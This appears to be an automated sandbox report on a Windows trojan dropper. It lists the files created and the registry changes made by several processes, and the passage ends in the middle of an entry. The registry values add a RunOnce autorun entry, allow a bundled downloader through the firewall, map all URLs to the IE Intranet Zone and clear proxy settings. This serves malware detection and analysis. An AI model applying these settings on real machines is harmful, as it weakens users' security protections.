%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAQJ8FJ8.gif (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\report[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CA8D6JGD.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\CAXPJNAK.gif (0 bytes)

Registry activity

The process wwwww_3340.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 DC D5 20 F6 C6 7F DD C1 32 A2 7D 66 5F 1B 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process vcredist_x86.exe:2720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 C1 A2 30 0E 0A 98 A1 2E 12 2B CA 17 1D F8 19"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"

The process netsh.exe:3112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1E F2 32 92 B2 4D 24 FB 16 EA EA 3D F3 DC 6C"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\107]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥â„¢Â¨"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\107]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥â„¢Â¨"

The process bddownloader.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 3C CD 0A D5 A9 15 92 D9 0E 05 A9 09 3D B6 5F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process bddownloader.exe:2820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 9C 97 C8 10 8F E6 99 70 BA 64 87 AC 87 5D 82"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process bddownloader.exe:2984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\baidu\bddownload\107\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\107\bddownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 53 3E BE EC 23 80 3F 78 94 0A 72 E8 A7 7B A0"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process guagua_77150006814.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 50 F6 7C AC F6 D5 BA A2 3B BA 70 7F 5B 85 C0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 17 9D 3C 29 22 76 80 8A 82 83 C5 38 5D 7E A5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process sc.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 19 AB 94 E1 E4 2E 42 42 05 31 6C A9 B0 4F F8"

The process sc.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 9F 68 B5 AB 96 A0 E8 DD 1A E9 A6 83 0A 50 7C"

The process YFMSever.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 B7 30 96 30 FC AE 84 C0 92 0C A5 D6 AF 36 92"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BDDownloader.exe:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 43 3B CB 19 9E 58 1A 17 18 7F C6 21 94 C3 DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\baidu\bddownload\107]
"bddownloader.exe" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥Â¼â€¢Ã¦â€œÅ½"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process BDDownloader.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 9B D0 CE E6 55 EE 51 BE 15 D9 56 65 80 64 96"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
